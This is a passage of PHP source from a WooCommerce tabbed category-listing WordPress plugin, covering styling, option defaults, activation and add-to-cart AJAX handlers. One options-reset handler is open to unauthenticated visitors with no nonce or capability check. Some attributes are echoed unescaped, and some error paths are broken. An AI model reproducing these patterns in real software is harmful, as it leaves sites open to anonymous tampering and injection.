                echo "@media screen and (min-width: 761px){
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container ul.qc_nav_style_1 {
                            z-index: 1;
                            width: 25%;
                            float: left;
                        }
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container .qc_tab_css_bg {
                            width: 75%;
                            height: auto;
                            clear: initial;
                            padding-top: 0px;
                            float: left;
                            padding-left: 4%;
                        }
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container ul.qc_nav_style_1 li {
                            border-radius: 0px !important;
                            box-shadow: 0px 0px 3px rgb(0 0 0 / 40%); 
                        }

                        .qc-tabs-style1 .woo_tab_container ul.qc_nav_style_1 li {
                            height: 38px !important;
                            width: 100%;
                            margin: 0;
                            padding: 0;
                            float: left;
                            line-height: 38px;
                            background-color: #EFF0F2;
                            border-bottom: 1px solid #fff;
                            border: 0px solid !important;
                            color: #888;
                            font-weight: 500;
                            display: block;
                            letter-spacing: 0;
                            outline: none;
                            padding: 0px 0px !important;
                            margin: 2px 0 2px 0;
                            text-decoration: none;
                            -webkit-transition: all 0.2s ease-in-out;
                            -moz-transition: all 0.2s ease-in-out;
                            transition: all 0.2s ease-in-out;
                        }

                        .qc-tabs-style1 .woo_tab_container ul.qc_nav_style_1 > li:hover, 
                        .qc-tabs-style1 .woo_tab_container ul.qc_nav_style_1 li.current { 
                            background-color: #ffffff !important; 
                            color: #000000 !important; 
                            border: 0px !important; 
                            border-radius: 0px !important; 
                            box-shadow: 0px 0px 3px rgb(0 0 0 / 40%);
                            -webkit-transition: all 0.2s ease-in-out;
                            -moz-transition: all 0.2s ease-in-out;
                            transition: all 0.2s ease-in-out;
                        } 
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container .qcld-tooltip {
                            width: 150%;
                            left: -30%;
                        }
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container ul.qc_nav_style_1 li .qcld_menu_status {
                            left: 0px;
                            height: 38px;
                            border-top-left-radius: 0px;
                            border-bottom-left-radius: 0px;
                        }
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container ul.qc_nav_style_1 li ul.qcld_children {
                            padding: 3px 0px !important;
                        }
                        .qc-tabs-style1.qc-tabs-style1_new .woo_tab_container ul.qc_nav_style_1 li ul.qcld_children li {
                            width: 100% !important;
                        }
                    }";


            }

        
        echo " .wooinstant-active .qcld-secondary-image-loop{
                display:none !important;
            } 

            .wooinstant-active .woo_tab_container .qcld-product-has-gallery .qcld-secondary-image-loop{
                display:inline-block !important;
            } ";

        ?>

       

    </style>
<?php 
}


add_action('wp_ajax_wootab_delete_all_options_for_uninstall', 'wootab_delete_all_options_for_uninstall');
add_action('wp_ajax_nopriv_wootab_delete_all_options_for_uninstall', 'wootab_delete_all_options_for_uninstall');

function wootab_delete_all_options_for_uninstall(){


    delete_option('product_price_font_color');
    delete_option('product_box_hover_color');
    delete_option('product_price_font_size');
    delete_option('display_category_image');

    // general settings
    delete_option('selected_categories');
    delete_option('qc_add_to_cart_type');
    delete_option('qc_product_sort_type');
    delete_option('category_order');
    delete_option('qc_product_sort_order');
    delete_option('qc_quick_sorting_on_off');
    delete_option('product_number');
    delete_option('max_char_per_cat');
    delete_option('qcld_slick_slider_number');
    delete_option('qcld_slick_slider_number_mobile');
    delete_option('qcld_twelve_slick_slider_number');
    delete_option('qcld_default_theme_column_number');
    delete_option('qcld_twelve_slick_slider_center_mode');
    delete_option('qc_woo_tabbed_cart_summary_style');
    delete_option('qc_woo_tabbed_cart_summary_position');
    delete_option('qc_woo_tabbed_cart_show_page');
    delete_option('hot_deals_product_number');
    delete_option('qcld_category_top_tooltip_show');
    delete_option('qcld_product_search_box_for_quick_search');
    delete_option('qcld_product_search_box_each_category');
    delete_option('show_all');

    // Set the default value general settings
    update_option('qc_add_to_cart_type', 'ajax');
    update_option('qc_product_sort_type', 'menu_order title');
    update_option('category_order', 'asc');
    update_option('qc_product_sort_order', 'asc');
    update_option('qc_quick_sorting_on_off', 'off');
    update_option('product_number', 20);
    update_option('max_char_per_cat', 25);
    update_option('qcld_slick_slider_number', 4);
    update_option('qcld_slick_slider_number_mobile', 1);
    update_option('qcld_twelve_slick_slider_number', 4);
    update_option('qcld_default_theme_column_number', 4);
    update_option('qcld_twelve_slick_slider_center_mode', '');
    update_option('qc_woo_tabbed_cart_summary_style', 'off');
    update_option('qc_woo_tabbed_cart_summary_position', 'wooinstantcart');
    update_option('qc_woo_tabbed_cart_show_page', 'single');
    update_option('qc_woo_tabbed_enable_dropdown_menu_tab', '');
    update_option('qc_woo_tabbed_product_loading_style', 'on');
    update_option('hot_deals_product_number', 18);
    update_option('qcld_category_top_tooltip_show', '');
    update_option('qcld_product_search_box_for_quick_search', '');
    update_option('qcld_product_search_box_each_category', '');
    update_option('show_all', 1);


    // display settings
    delete_option('display_price');
    delete_option('display_rating');
    delete_option('product_title');
    delete_option('add_cart_link');
    delete_option('add_quantity_select');
    delete_option('product_category_text_font_size');
    delete_option('category_style');
    delete_option('thirteen_category_btn_mode');
    delete_option('change_title_text_size');
    delete_option('product_content_text_size');
    delete_option('qc_slick_slider_on_off');
    delete_option('qcld_woo_tabbed_show_category_dropdown');
    delete_option('qc_quick_view_on_off');
    delete_option('qc_category_filter_fixed_on_off');
    delete_option('qc_woo_tabbed_enable_theme_10_navbar_menu_tab');
    delete_option('qc_woo_tabbed_enable_category_image');
    delete_option('qc_woo_tabbed_enable_product_tag_filter');
    delete_option('qc_woo_tabbed_enable_cat_sub_cat_filter');
    delete_option('qc_woo_tabbed_enable_related_product_replace');

    // Set the default value display settings
    update_option('display_price', 1);
    update_option('display_rating', 1);
    update_option('product_title', 1);
    update_option('add_cart_link', 1);
    update_option('add_quantity_select', 1);
    update_option('category_style', 2);
    update_option('thirteen_category_btn_mode', 1 );
    update_option('qc_slick_slider_on_off', 'on');
    update_option('qc_quick_view_on_off', 'off');
    update_option('qcld_woo_tabbed_show_category_dropdown', 'off');
    update_option('qc_category_filter_fixed_on_off', 'off');
    update_option('qc_woo_tabbed_enable_theme_10_navbar_menu_tab', '');
    update_option('qc_woo_tabbed_enable_category_image', '');


    // Color Settings
    delete_option('container_background_color');
    delete_option('product_title_text_color');
    delete_option('product_content_text_color');
    delete_option('product_category_text_font_color');
    delete_option('product_category_button_active_color');
    delete_option('product_category_filter_button_color');
    delete_option('product_category_filter_button_color_hover');
    delete_option('product_ratting_color');
    delete_option('product_add_to_cart_button_color');
    delete_option('category_filters_border_color');
    delete_option('qcld_dropdown_menu_font_color');
    delete_option('qcld_dropdown_menu_background_color');
    delete_option('qcld_dropdown_active_menu_background_color');
    delete_option('qc_woo_tabbed_enable_dropdown_menu_tab');
    delete_option('qc_woo_tabbed_product_loading_style');

    // Select Style
    delete_option('tabbed_theme');
    update_option('tabbed_theme', 'one');

    // Language Center
    delete_option('success_alert_message');
    delete_option('title_text');
    delete_option('change_load_more_text');
    delete_option('change_add_to_cart_button_text');
    delete_option('change_all_category_button_text');
    delete_option('no_product_found_text');
    delete_option('qcld_hot_deal_tab_lan_hot');
    delete_option('qcld_hot_deal_tab_lan_new');
    delete_option('qcld_hot_deal_tab_lan_best_buy');
    delete_option('qcld_hot_deal_tab_lan_feature');
    delete_option('qcld_lan_search_for_product');
    delete_option('qcld_lan_default_sorting');
    delete_option('qcld_lan_sort_by_popularity');
    delete_option('qcld_lan_sort_by_average_rating');
    delete_option('qcld_lan_sort_by_newness');
    delete_option('qcld_lan_sort_by_price_low_to_high');
    delete_option('qcld_lan_sort_by_price_high_to_low');

    delete_option('qcld_lan_cart_summary');

    // Set the default value Language Center
    update_option('success_alert_message', 'Product Has Successfully Been Added To Your Cart !');
    update_option('title_text', 'Good Job');
    update_option('change_load_more_text', 'Load More');
    update_option('change_add_to_cart_button_text', 'Add To Cart');
    update_option('no_product_found_text', 'No product found!');
    update_option('qcld_hot_deal_tab_lan_hot', 'Hot');
    update_option('qcld_hot_deal_tab_lan_new', 'New');
    update_option('qcld_hot_deal_tab_lan_best_buy', 'Best Buy');
    update_option('qcld_hot_deal_tab_lan_feature', 'Featured');
    update_option('qcld_lan_search_for_product', 'Search for product');
    update_option('qcld_lan_default_sorting', 'Default sorting');
    update_option('qcld_lan_sort_by_popularity', 'Sort by popularity');
    update_option('qcld_lan_sort_by_average_rating', 'Sort by popularity');
    update_option('qcld_lan_sort_by_newness', 'Sort by newness');
    update_option('qcld_lan_sort_by_price_low_to_high', 'Sort by price: low to high');
    update_option('qcld_lan_sort_by_price_high_to_low', 'Sort by price: high to low');
    
    update_option('qcld_lan_cart_summary', 'Cart Summary');
    update_option('qc_woo_tabbed_shortcode_preview', '');


    // Custom css
    delete_option('custom_global_css');

    update_option('woo_tabbed_do_activation_optimize_css', 'on');
    update_option('woo_tabbed_do_activation_optimize_js', 'on');

    update_option('qcld_woo_tabbed_regenerate_cache_time', 3000);
    

    $html = 'Reset all options to default successfully.';
    wp_send_json($html);
    wp_die();
}


register_activation_hook(__FILE__, 'wtcpl_pro_woo_tab_demo_content');

function wtcpl_pro_woo_tab_demo_content()
{

    if (get_option('product_number') == '') {
        update_option('product_number', 15);
    }
    if (get_option('hot_deals_product_number') == '') {
        update_option('hot_deals_product_number', 18);
    }
    if (get_option('qcld_category_top_tooltip_show') == '') {
        update_option('qcld_category_top_tooltip_show', '');
    }
    if (get_option('qcld_product_search_box_for_quick_search') == '') {
        update_option('qcld_product_search_box_for_quick_search', '');
    }
    if (get_option('qcld_product_search_box_each_category') == '') {
        update_option('qcld_product_search_box_each_category', '');
    }
    if (get_option('add_quantity_select') == '') {
        update_option('add_quantity_select', 1);
    }
    if (get_option('display_price') == 1) {
        update_option('display_price', 1);
    }
    if (get_option('add_quantity_select') == 1) {
        update_option('add_quantity_select', 1);
    }
    if (get_option('display_price') == 1) {
        update_option('display_price', 1);
    }
    if (get_option('display_rating') != 1) {
        update_option('display_rating', 1);
    }
    if (get_option('product_title') != 1) {
        update_option('product_title', 1);
    }
    if (get_option('add_cart_link') != 1) {
        update_option('add_cart_link', 1);
    }
    if (get_option('max_char_per_cat') == '') {
        update_option('max_char_per_cat', 25);
    }
    if (get_option('qcld_slick_slider_number') == '') {
        update_option('qcld_slick_slider_number', 4);
    }
    if (get_option('qcld_slick_slider_number_mobile') == '') {
        update_option('qcld_slick_slider_number_mobile', 1);
    }
    if (get_option('qcld_twelve_slick_slider_number') == '') {
        update_option('qcld_twelve_slick_slider_number', 4);
    }
    if (get_option('qcld_default_theme_column_number') == '') {
        update_option('qcld_default_theme_column_number', 4);
    }
    if (get_option('qcld_twelve_slick_slider_center_mode') == '') {
        update_option('qcld_twelve_slick_slider_center_mode', '');
    }
    if ( get_option('tabbed_theme') == '') {
        update_option('tabbed_theme', 'one');
    }
    if (get_option('qc_woo_tabbed_product_loading_style') == '') {
        update_option('qc_woo_tabbed_product_loading_style', 'on');
    }
    if (get_option('show_all') == '') {
        update_option('show_all', 1);
    }
    if (get_option('category_style') == '') {
        update_option('category_style', 2);
    }
    if (get_option('thirteen_category_btn_mode') == '') {
        update_option('thirteen_category_btn_mode', 1 );
    }
    if (get_option('category_order') == '') {
        update_option('category_order', 'asc');
    }
    if (get_option('qc_quick_sorting_on_off') == '') {
        update_option('qc_quick_sorting_on_off', 'off');
    }
    if (get_option('success_alert_message') == '') {
        update_option('success_alert_message', 'Product Has Successfully Been Added To Your Cart !');
    }
    if (get_option('change_add_to_cart_button_text') == '') {
        update_option('change_add_to_cart_button_text', 'Add To Cart');
    }
    if (get_option('change_load_more_text') == '') {
        update_option('change_load_more_text', 'Load More');
    }
    if (get_option('change_all_category_button_text') == '') {
        update_option('change_all_category_button_text', 'All');
    }
    if (get_option('title_text') == '') {
        update_option('title_text', 'Good Job');
    }
    if (get_option('qc_product_sort_order') == '') {
        update_option('qc_product_sort_order', 'asc');
    }
    if (get_option('qc_product_sort_type') == '') {
        update_option('qc_product_sort_type', 'menu_order title');
    }
    if (get_option('qc_add_to_cart_type') == '') {
        update_option('qc_add_to_cart_type', 'ajax');
    }
    if (get_option('qc_slick_slider_on_off') == '') {
        update_option('qc_slick_slider_on_off', 'on');
    }
    if (get_option('qc_quick_view_on_off') == '') {
        update_option('qc_quick_view_on_off', 'off');
    }
    if (get_option('qcld_woo_tabbed_show_category_dropdown') == '') {
        update_option('qcld_woo_tabbed_show_category_dropdown', 'off');
    }
    if (get_option('qc_category_filter_fixed_on_off') == '') {
        update_option('qc_category_filter_fixed_on_off', 'off');
    }
    if (get_option('qc_woo_tabbed_cart_summary_style') == '') {
        update_option('qc_woo_tabbed_cart_summary_style', 'off');
    }
    if (get_option('qc_woo_tabbed_cart_summary_position') == '') {
        update_option('qc_woo_tabbed_cart_summary_position', 'wooinstantcart');
    }
    if (get_option('qc_woo_tabbed_cart_show_page') == '') {
        update_option('qc_woo_tabbed_cart_show_page', 'single');
    }
    if (get_option('qc_woo_tabbed_enable_product_alert_message_success') == '') {
        update_option('qc_woo_tabbed_enable_product_alert_message_success', 'enable');
    }
    if (get_option('qc_woo_tabbed_enable_product_alert_message_success_mobile') == '') {
        update_option('qc_woo_tabbed_enable_product_alert_message_success_mobile', 'enable');
    }
    if (get_option('qc_slick_slider_auto_scroll_on_off') == '') {
        update_option('qc_slick_slider_auto_scroll_on_off', 'true');
    }
    if (get_option('qc_slick_slider_auto_scroll_infinite_on_off') == '') {
        update_option('qc_slick_slider_auto_scroll_infinite_on_off', 'true');
    }
    if (get_option('qc_woo_tabbed_display_category_search_sort_top') == '') {
        update_option('qc_woo_tabbed_display_category_search_sort_top', 'bottom');
    }
    if (get_option('qc_woo_tabbed_display_rtl_support') == '') {
        update_option('qc_woo_tabbed_display_rtl_support', '');
    }
    if (get_option('qc_woo_tabbed_display_category_url_based') == '') {
        update_option('qc_woo_tabbed_display_category_url_based', '');
    }
    if (get_option('qc_woo_tabbed_shortcode_preview') == '') {
        update_option('qc_woo_tabbed_shortcode_preview', '');
    }

    add_option('woo_tab_plugin_do_activation_redirect', true);


    update_option('woo_tabbed_do_activation_optimize_css', true);
    update_option('woo_tabbed_do_activation_optimize_js', true);

    update_option('qcld_woo_tabbed_regenerate_cache_time', 3000);

    /**
     * Free version replace code.
     */
    $free = array( 'woo-tabbed-category-product-listing/woo-tabbed-category-product-listing.php' );
    $all_plugins = get_plugins();
    foreach( $all_plugins as $plugin => $plugin_details ){
        if( in_array( $plugin, $free ) ){
            if( is_plugin_active( $plugin ) ){
                if( deactivate_plugins( array( $plugin ) ) ){
                    delete_plugins( array( $plugin ) );
                }
            } else {
                delete_plugins( array( $plugin ) );
            }
        }
    }
    /**
     * Free version replace code End.
     */


}

// redirect when activation plugin...
add_action('admin_init', 'woo_tab_plugin_redirect');
function woo_tab_plugin_redirect(){
    if(get_option('woo_tab_plugin_do_activation_redirect', false)){
        delete_option('woo_tab_plugin_do_activation_redirect');
        if(!isset($_GET['activate-multi'])){
            wp_redirect("admin.php?page=woo-tab");
        }
    }
}


include_once('functions-theme-ten.php');
include_once('functions-theme-eleven.php');

    function wtcp_slick_slider_active_function() {
        $qc_slick_slider_on_off_variable = get_option('qc_slick_slider_on_off');
            if($qc_slick_slider_on_off_variable == 'on'){
                $qcld_slick_slider_number = get_option('qcld_slick_slider_number') ? get_option('qcld_slick_slider_number') : '4';
                $qcld_slick_slider_number_mobile = get_option('qcld_slick_slider_number_mobile') ? get_option('qcld_slick_slider_number_mobile') : '1';
                $qc_slick_auto_scroll = get_option('qc_slick_slider_auto_scroll_on_off') ? get_option('qc_slick_slider_auto_scroll_on_off') : 'false';
                $qc_slick_auto_scroll_infinite = get_option('qc_slick_slider_auto_scroll_infinite_on_off') ? get_option('qc_slick_slider_auto_scroll_infinite_on_off') : 'false';
                $qc_slick_rtl_support = ( get_option('qc_woo_tabbed_display_rtl_support') == 'enable' ) ? 'true' : 'false';
                    ?>
                        <script>
                            jQuery(document).ready(function ($) {

                                function mySetupFunction() {
                                    var fullwidth = window.innerWidth;
                                    var device_width = ($(window).width());
                                    var cat_count_number = <?php echo $qcld_slick_slider_number; ?>;
                                    var cat_count_number_mobile = <?php echo $qcld_slick_slider_number_mobile; ?>;
                                    var qc_slick_auto_scroll = <?php echo $qc_slick_auto_scroll; ?>;
                                    var qc_slick_auto_scroll_infinite = <?php echo $qc_slick_auto_scroll_infinite; ?>;
                                    var qc_slick_rtl_support = <?php echo $qc_slick_rtl_support; ?>;
                                    if (device_width <= 480) {

                                        $(".qc_nav_style_1").addClass('slick-class');
                                        $(".qc-wootabs-nav").addClass('slick-class');
                                        $('.slick-class').slick({
                                            slide: 'li',
                                            autoplay: qc_slick_auto_scroll,
                                            infinite: qc_slick_auto_scroll_infinite,
                                            slidesToShow: cat_count_number_mobile,
                                            slidesToScroll: 1,
                                            rtl:qc_slick_rtl_support
                                        });
                                    } else {

                                        $('.slick-class').slick({
                                            slide: 'li',
                                            autoplay: qc_slick_auto_scroll,
                                            infinite: qc_slick_auto_scroll_infinite,
                                            slidesToShow: cat_count_number,
                                            slidesToScroll: 1,
                                            rtl:qc_slick_rtl_support
                                        });
                                        $(".qc-wootabs-nav").removeClass('slick-class');

                                    }
                                }

                                $(document).ready(mySetupFunction);
                                $(window).resize(mySetupFunction);
                                
                            });

                            
                        </script>

                    <?php
                }

        ?>
        <script>
        
        jQuery(document).ready(function ($) {

            /* Template eleven when menu category click then scroll product section */
            function mySetupClickFunction() {
                var device_widths = ($(window).width());
                if( device_widths <= 480 ){
                    $(document).on('click','.qc-wootabs-style11 .qc-wootabs-nav li',function(){
                        var full_height = $(window).height();
                        var comnt = $(this).height();
                       // alert(comnt);
                        var distance = full_height + comnt;
                        $('html, body').animate({scrollTop: distance }, 'fast');
                        return false;
                    });
                }
            }


            $(document).ready(mySetupClickFunction);
            $(window).resize(mySetupClickFunction);

        });
        </script>

        <?php



        $qc_category_filter_fixed_on_off_variable = get_option('qc_category_filter_fixed_on_off');
        $qc_category_filter_fixed_full_page_on_off = get_option('qc_category_filter_fixed_full_page_on_off');
        if($qc_category_filter_fixed_on_off_variable == 'on'){
            if ( !is_cart() && !is_checkout() ) { 
        ?>
        <script>
        
        jQuery(document).ready(function ($) {

            function is_stickyClickFunction() {
                //var qc_inner_heights = $('.container-qc').innerHeight();
                var device_widths = ($(window).width());
                if( device_widths > 639 ){
                    
                    $(window).on('scroll', function () {
                        var qc_inner_heights = $('.woo_tab_container').innerHeight();
                        if ($(this).scrollTop() < qc_inner_heights) {

                            $(".is_cat_stickyed").sticky({topSpacing:100});

                        }else{
                        
                        <?php  if($qc_category_filter_fixed_full_page_on_off != 'on'){ ?>
                           $(".is_cat_stickyed").unstick();
                        <?php } ?>

                        }
                    });

                }else{
                   $(".is_cat_stickyed").sticky({topSpacing:60});
                }

            }

            $(document).ready(is_stickyClickFunction);
            $(window).resize(is_stickyClickFunction);

        });


        </script>
        <style type="text/css">
            .is-sticky  {
                z-index: 999999999999 !important;
                position: relative!important;
            }
        </style>

        <?php
        }

    }




}

add_action( 'qcld_express_product_variations', 'woocommerce_template_single_add_to_cart');


//Add to cart for variable product.
add_action('wp_ajax_woo_tab_vp_add_to_cart', 'qcld_express_woo_tab_vp_add_to_cart');
add_action('wp_ajax_nopriv_woo_tab_vp_add_to_cart', 'qcld_express_woo_tab_vp_add_to_cart');


function qcld_express_woo_tab_vp_add_to_cart()
{
    ob_start();

        
    $product_id = apply_filters( 'woocommerce_add_to_cart_product_id', absint( $_POST['product_id'] ) );
    $quantity = empty( $_POST['quantity'] ) ? 1 : apply_filters( 'woocommerce_stock_amount', $_POST['quantity'] );
    $variation_id = $_POST['variation_id'];
    $variation  = $_POST['variation'];
    $passed_validation = apply_filters( 'woocommerce_add_to_cart_validation', true, $product_id, $quantity );

    if ( $passed_validation && WC()->cart->add_to_cart( $product_id, $quantity, $variation_id, $variation  ) ) {
        do_action( 'woocommerce_ajax_added_to_cart', $product_id );
        if ( get_option( 'woocommerce_cart_redirect_after_add' ) == 'yes' ) {
            wc_add_to_cart_message( $product_id );
        }

        // Return fragments
        WC_AJAX::get_refreshed_fragments();
    } else {
        $this->json_headers();

        // If there was an error adding to the cart, redirect to the product page to show any errors
        $data = array(
            'error' => true,
            'product_url' => apply_filters( 'woocommerce_cart_redirect_after_error', get_permalink( $product_id ), $product_id )
            );
        echo json_encode( $data );
    }


    echo wp_send_json($attributes);


    wp_die();

}


function wtcp_quick_view_and_fixed_category_filter_active_function() {
 
        $qc_category_filter_fixed_on_off_variable = get_option('qc_category_filter_fixed_on_off');
        if($qc_category_filter_fixed_on_off_variable == 'on'){
            if ( !is_cart() && !is_checkout() ) { 
        ?>
        <script>
        
        jQuery(document).ready(function ($) {

            function is_stickyClickFunction() {
                //var qc_inner_heights = $('.container-qc').innerHeight();
                var device_widths = ($(window).width());
                if( device_widths > 639 ){
                    
                    $(window).on('scroll', function () {
                        var qc_inner_heights = $('.woo_tab_container').innerHeight();
                        if ($(this).scrollTop() < qc_inner_heights) {

                            $(".is_cat_stickyed").sticky({topSpacing:100});

                        } else {
                           $(".is_cat_stickyed").unstick();
                        }
                    });

                }else{
                   $(".is_cat_stickyed").sticky({topSpacing:60});
                }

            }

            $(document).ready(is_stickyClickFunction);
            $(window).resize(is_stickyClickFunction);

        });


        </script>
        <style type="text/css">
            .is-sticky  {
                z-index: 999999999999 !important;
                position: relative!important;
            }
        </style>

        <?php
        }

    }
}
//add_action('wp_footer','wtcp_quick_view_and_fixed_category_filter_active_function');


//Add to cart for simple product.
add_action('wp_ajax_woo_tab_sp_add_to_cart', 'qcld_express_woo_tab_sp_add_to_cart');
add_action('wp_ajax_nopriv_woo_tab_sp_add_to_cart', 'qcld_express_woo_tab_sp_add_to_cart');


function qcld_express_woo_tab_sp_add_to_cart()
{
    /*$product_id = $_POST['p_id'];
    $product_quantity = $_POST['quantity'];*/
    $product_id = apply_filters( 'woocommerce_add_to_cart_product_id', absint( $_POST['p_id'] ) );
    $product_quantity = empty( $_POST['quantity'] ) ? 1 : apply_filters( 'woocommerce_stock_amount', $_POST['quantity'] );
    global $woocommerce;
    $result = $woocommerce->cart->add_to_cart($product_id,$product_quantity);
    if ($result != false) {
        echo wp_send_json('simple');
    } else {
        echo wp_send_json('error');
    }
    wp_die();
}


 function qcld_express_woo_tab_shop_script_to_footer(){
    if( ! is_admin() ) { ?>
    <script>
        /*
    jQuery(document).ready(function($){
    $(document).on('click', '.qcld-express-qty-increase', function(e) {
        $input = $(this).prev('input.qty');
        var val = parseInt($input.val());
        var step = $input.attr('step');
        step = 'undefined' !== typeof(step) ? parseInt(step) : 1;
        $input.val( val + step ).change();
    });
    $(document).on('click', '.qcld-express-qty-decrease', 
        function(e) {
        $input = $(this).next('input.qty');
        var val = parseInt($input.val());
        var step = $input.attr('step');
        step = 'undefined' !== typeof(step) ? parseInt(step) : 1;
        if (val > 0) {
            $input.val( val - step ).change();
        } 
    });
});

*/
</script>
<?php }
}
add_action( 'wp_footer', 'qcld_express_woo_tab_shop_script_to_footer' );



require_once('woo-tabbed-cart-functions.php');

/**
 *  Enqueue Wooinstant scripts
 *
 */
function qcld_woo_tabbed_plugin_enqueue_scripts(){

    if (is_admin()) {
        return;
    }

    wp_enqueue_style('qcld-font-awesome', plugin_dir_url( __FILE__ ) . 'css/font-awesome.css' );
    wp_enqueue_style('qcld-wootab-stylesheet', plugin_dir_url( __FILE__ ) . 'css/woo-tabbed-cart-styles.css' );

    wp_enqueue_script('qcld-wootab-script', plugin_dir_url( __FILE__ ) . 'js/woo-tabbed-cart-scripts.js', array( 'jquery' ), '', true );
    wp_enqueue_script( 'qcld-wootab-ajax-script', plugin_dir_url( __FILE__ ) . 'js/woo-tabbed-cart-ajax-scripts.js', array('jquery'), '', true );
    
    wp_localize_script( 'qcld-wootab-ajax-script', 'qcld_woo_tabbed_ajax_params', 
        array(
            'qcld_woo_tabbed_ajax_nonce' => wp_create_nonce( 'qcld_woo_tabbed_ajax_nonce'),
            'qcld_woo_tabbed_ajax_url' => admin_url('admin-ajax.php')
        )
    );

    
    //first check that woo exists to prevent fatal errors
    if( function_exists('is_woocommerce') ) {
        $suffix               = defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ? : '.min';
        $lightbox_en          = 'yes' === get_option( 'woocommerce_enable_lightbox' );
        $ajax_cart_en         = 'yes' === get_option( 'woocommerce_enable_ajax_add_to_cart' );
        $assets_path          = str_replace( array( 'http:', 'https:' ), '', WC()->plugin_url() ) . '/assets/';
        $frontend_script_path = $assets_path . 'js/frontend/';

        wp_enqueue_script( 'wc-cart', $frontend_script_path . 'cart' . $suffix . '.js', array( 'jquery', 'wc-country-select', 'wc-address-i18n' ) );

        wp_localize_script('wc-cart', 'wc_cart_params', apply_filters('wc_cart_params', array(
            'ajax_url' => WC()->ajax_url() ,
            'wc_ajax_url' => WC_AJAX::get_endpoint(' %%endpoint%%') ,
            'ajax_loader_url' => apply_filters('woocommerce_ajax_loader_url', $assets_path . 'images / ajax - loader@2x . gif') ,
            'update_shipping_method_nonce' => wp_create_nonce('update-shipping-method') ,
        )));

        wp_enqueue_script( 'wc-checkout', $frontend_script_path . 'checkout' . $suffix . '.js', array( 'jquery', 'wc-address-i18n' ) );

        wp_localize_script('wc-checkout', 'wc_checkout_params', apply_filters('wc_checkout_params', array(
            'ajax_url'                  => WC()->ajax_url(),
            'wc_ajax_url'               => WC_AJAX::get_endpoint( '%%endpoint%%' ),
            'update_order_review_nonce' => wp_create_nonce( 'update-order-review' ),
            'apply_coupon_nonce'        => wp_create_nonce( 'apply-coupon' ),
            'remove_coupon_nonce'       => wp_create_nonce( 'remove-coupon' ),
            'option_guest_checkout'     => get_option( 'woocommerce_enable_guest_checkout' ),
            'checkout_url'              => WC_AJAX::get_endpoint( 'checkout' ),
            'is_checkout'               => is_checkout() && empty( $wp->query_vars['order-pay'] ) && ! isset( $wp->query_vars['order-received'] ) ? 1 : 0,
            'debug_mode'                => defined( 'WP_DEBUG' ) && WP_DEBUG,
            'i18n_checkout_error'       => esc_attr__( 'Error processing checkout. Please try again.', 'woocommerce' ),
        )));

        wp_enqueue_script( 'wc-add-to-cart-variation', $frontend_script_path . 'add-to-cart-variation' . $suffix . '.js', array( 'jquery', 'wp-util', 'jquery-blockui' ) );
        
        wp_localize_script('wc-add-to-cart-variation', 'wc_add_to_cart_variation_params', apply_filters('wc_add_to_cart_variation_params', array(
            'wc_ajax_url'                      => WC_AJAX::get_endpoint( '%%endpoint%%' ),
            'i18n_no_matching_variations_text' => esc_attr__( 'Sorry, no products matched your selection. Please choose a different combination.', 'woocommerce' ),
            'i18n_make_a_selection_text'       => esc_attr__( 'Please select some product options before adding this product to your cart.', 'woocommerce' ),
            'i18n_unavailable_text'            => esc_attr__( 'Sorry, this product is unavailable. Please choose a different combination.', 'woocommerce' ),
        )));

        wp_enqueue_style('select2');
        wp_enqueue_script('select2');
        wp_enqueue_script( 'wc-country-select' );
    }
}




/* Product Search Form  */

function qcld_woo_tabbed_product_search_by_category($theme_name=null, $data_show_sale=null, $data_feature_only=null, $data_cat_attr=null,$data_offset=null, $title_modal=null) {
        $taxonomy           = 'product_cat';
        $post_type          = 'product';            
        $placeholder_text   = get_option('qcld_lan_search_for_product');
        //$placeholder_text = esc_attr__('Search for product ...');
    ?>

    <div class="qcld-search-form-wrapper">
           
            <div class="qcld-search_products">
                <input type="text" value="<?php echo get_search_query(); ?>" name="s" 
                data-theme-name="<?php echo $theme_name; ?>" 
                data-show-sale="<?php echo $data_show_sale; ?>"
                data-feature-only="<?php echo $data_feature_only; ?>"
                data-cat-attr="<?php echo $data_cat_attr; ?>"
                data-offset="<?php echo $data_offset; ?>" 
                title-modal="<?php echo $title_modal; ?>"

                class="search-field" placeholder="<?php echo esc_html($placeholder_text, 'woo-tabbed-category'); ?>" autocomplete="off" />
                <button type="submit" class="qcld-search-submit"><i class="fa fa-search"></i></button>
                <div class="qcld-live-search-results"></div>
            </div>
    </div>

    <?php
}


if (empty(get_option('show_all'))){

    function woo_tabbed_all_button_when_remove(){
        ?>
        <script type="text/javascript">
        jQuery(document).ready(function ($) {

            $('.qc_tab_css_bg .tab-content:first-child').addClass('current');
            $('.ilist-section-25 .tab-content:first').addClass('current');

        });
        </script>
        <?php

    }

    add_action('wp_footer', 'woo_tabbed_all_button_when_remove');
}


if( get_option('qc_woo_tabbed_cart_summary_position') == 'wooinstantcart' ){

function woo_tabbed_custom_woocommerce_enable_ajax_add_to_cart() {

    // Unset all options related to the cart
    update_option( 'woocommerce_enable_ajax_add_to_cart', 'yes' );

}
add_action('template_redirect', 'woo_tabbed_custom_woocommerce_enable_ajax_add_to_cart');

}

function qcld_product_product_has_gallery( $product_id ) {

    $product        = wc_get_product( $product_id );
    $attachment_ids = $product->get_gallery_image_ids();

    $qc_woo_tabbed_product_hover_gallery_image = get_option('qc_woo_tabbed_product_hover_gallery_image');

    if ( $attachment_ids && $qc_woo_tabbed_product_hover_gallery_image  ) {

        $classes    = 'qcld-product-has-gallery';
        return $classes;
    }

}

function qcld_product_second_product_thumbnail( $product_id ) {

    //global $product;
    $product        = wc_get_product( $product_id );
    $attachment_ids = $product->get_gallery_image_ids();
    $qc_woo_tabbed_product_hover_gallery_image = get_option('qc_woo_tabbed_product_hover_gallery_image');

    if ( $attachment_ids && $qc_woo_tabbed_product_hover_gallery_image ) {
        $secondary_image_id = $attachment_ids['0'];
        return wp_get_attachment_image( $secondary_image_id, 'shop_catalog', '', $attr = array( 'class' => 'qcld-secondary-image attachment-shop-catalog size-shop_catalog animated' ) );
    }

}


add_filter( 'post_class', 'qcld_product_has_gallery' );
function qcld_product_has_gallery( $classes ) {

    global $product;
    $post_type = get_post_type( get_the_ID() );

    if ( ! is_admin() ) {

